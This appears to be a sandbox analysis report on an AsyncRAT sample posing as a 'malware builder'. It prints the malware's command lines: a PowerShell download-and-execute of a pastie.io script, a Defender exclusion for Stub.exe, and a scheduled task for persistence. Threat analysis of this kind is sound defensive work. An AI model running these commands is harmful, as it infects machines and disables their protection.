Analysis Overview
SHA256
c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e
Threat Level: Known bad
The file H-Malware Builder V5.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Async RAT payload
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Drops startup file
Checks computer location settings
Suspicious use of SetThreadContext
Drops file in System32 directory
Unsigned PE
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Scheduled Task/Job: Scheduled Task
Modifies data under HKEY_USERS
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-19 18:52
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-19 18:52
Reported
2024-06-19 18:52
Platform
win10v2004-20240508-en
Max time kernel
10s
Max time network
23s
Command Line
Signatures
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2252 created 608 | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Windows\system32\winlogon.exe |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2252 set thread context of 1264 | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018400E3FB4E05F" | C:\Windows\system32\svchost.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\SCHTASKS.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\SCHTASKS.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{1d6b1314-e146-455d-ac22-8b1c5f39adf0}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SYSTEM32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\SYSTEM32\SCHTASKS.exe
"SCHTASKS.exe" /create /tn "$77Stub.exe" /tr "'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'" /sc onlogon /rl HIGHEST
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell "irm pastie.io/raw/fgaazw | iex"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastie.io | udp |
| US | 8.8.8.8:53 | bay-helps.gl.at.ply.gg | udp |
Files
memory/372-0-0x00007FFB552B3000-0x00007FFB552B5000-memory.dmp
memory/372-1-0x0000000000960000-0x00000000009CC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g0g4er14.3dd.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1380-7-0x0000029760550000-0x0000029760572000-memory.dmp
memory/1380-12-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp
memory/1380-13-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp
memory/1380-14-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp
memory/1380-17-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
| MD5 | cc63633edfcc147cbaed1959b03d8730 |
| SHA1 | df7a250eba6ee1767b09f7923bfd735635deb9e8 |
| SHA256 | e699d9e9a81e9de82ce7ed645ef2a92ed6231e32cbc18a7e9ddff5c82623d417 |
| SHA512 | a584893714d46c6bdf4cc0a097b5f088a9aa49eea07b181745ca9b351b570c8ac3487bfe53a8a97213f5d8a7f71dbf4070ff92eab58b2ff7a4d0e784e17d02d4 |
memory/372-29-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp
memory/2252-31-0x000001CFA3190000-0x000001CFA31DE000-memory.dmp
memory/2252-34-0x00007FFB71F00000-0x00007FFB71FBE000-memory.dmp
memory/372-35-0x00007FFB552B0000-0x00007FFB55D71000-memory.dmp
memory/2252-33-0x00007FFB734D0000-0x00007FFB736C5000-memory.dmp
memory/2252-32-0x000001CFA4D80000-0x000001CFA4DBE000-memory.dmp
memory/1264-36-0x0000000140000000-0x0000000140040000-memory.dmp
memory/1264-37-0x0000000140000000-0x0000000140040000-memory.dmp
memory/2252-40-0x000001CFBD9B0000-0x000001CFBD9C2000-memory.dmp
memory/1264-39-0x00007FFB71F00000-0x00007FFB71FBE000-memory.dmp
memory/1264-38-0x00007FFB734D0000-0x00007FFB736C5000-memory.dmp
memory/316-54-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/508-61-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1172-81-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1216-85-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1216-84-0x000001A6EDCB0000-0x000001A6EDCDA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/1172-80-0x000001BF90430000-0x000001BF9045A000-memory.dmp
memory/1140-78-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1140-77-0x0000027B672C0000-0x0000027B672EA000-memory.dmp
memory/1132-75-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1132-74-0x00000210C5060000-0x00000210C508A000-memory.dmp
memory/1124-72-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1124-71-0x000002A732340000-0x000002A73236A000-memory.dmp
memory/1016-69-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/1016-68-0x0000027E7C9B0000-0x0000027E7C9DA000-memory.dmp
memory/508-60-0x00000246A9860000-0x00000246A988A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cadef9abd087803c630df65264a6c81c |
| SHA1 | babbf3636c347c8727c35f3eef2ee643dbcc4bd2 |
| SHA256 | cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438 |
| SHA512 | 7278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085 |
memory/952-57-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/952-56-0x0000025CD73D0000-0x0000025CD73FA000-memory.dmp
memory/316-53-0x0000024C8C100000-0x0000024C8C12A000-memory.dmp
memory/668-49-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/668-48-0x000002AF37B10000-0x000002AF37B3A000-memory.dmp
memory/608-45-0x00007FFB33550000-0x00007FFB33560000-memory.dmp
memory/608-44-0x00000294232A0000-0x00000294232CA000-memory.dmp
memory/608-43-0x0000029422ED0000-0x0000029422EF3000-memory.dmp
memory/1264-41-0x0000000140000000-0x0000000140040000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\H-Malware Builder V5.exe.log
| MD5 | 2ff39f6c7249774be85fd60a8f9a245e |
| SHA1 | 684ff36b31aedc1e587c8496c02722c6698c1c4e |
| SHA256 | e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced |
| SHA512 | 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1 |
memory/3068-343-0x0000000000330000-0x000000000039C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 3737c3eb5510d74c3d6ea770e9ff4ffb |
| SHA1 | 88148610a4f00560b06bc8607794d85f15bf3b64 |
| SHA256 | b716e0860cc27dd1035a125f44833c5999f4a0429635df6d97634f041b25effa |
| SHA512 | db4db804933ab50bf56130a939040e33a57e4ec056c9e0c598bcae86bbaf093e2a22fd4ec8801f6b029985170f17859a931e63f28a7abb4f91780da2a33e1ebc |
memory/5048-376-0x0000000000A30000-0x0000000000A9C000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-19 18:52
Reported
2024-06-19 18:55
Platform
win7-20240221-en
Max time kernel
53s
Max time network
146s
Command Line
Signatures
AsyncRat
Suspicious use of NtCreateUserProcessOtherParentProcess
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe | C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe | N/A |
Executes dropped EXE
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\Tasks\$77Stub.exe | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\$77Stub.exe | C:\Windows\system32\svchost.exe | N/A |
| File created | C:\Windows\system32\wbem\Performance\WmiApRpl_new.h | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
| File created | C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini | C:\Windows\system32\wbem\WMIADAP.EXE | N/A |
Suspicious use of SetThreadContext
Enumerates physical storage devices
Scheduled Task/Job: Scheduled Task
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
| N/A | N/A | C:\Windows\system32\conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\taskhost.exe
"taskhost.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\sppsvc.exe
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe'
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe"
C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe
"C:\Users\Admin\AppData\Local\Temp\H-Malware Builder V5.exe"
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{2200d1fc-b5e3-44f4-89c8-7829bdc43f62}
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell "irm pastie.io/raw/fgaazw | iex"
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-759720614-114551988-10829642891142499248-1346065353-1708930420-1692500942159465668"
C:\Windows\system32\SCHTASKS.exe
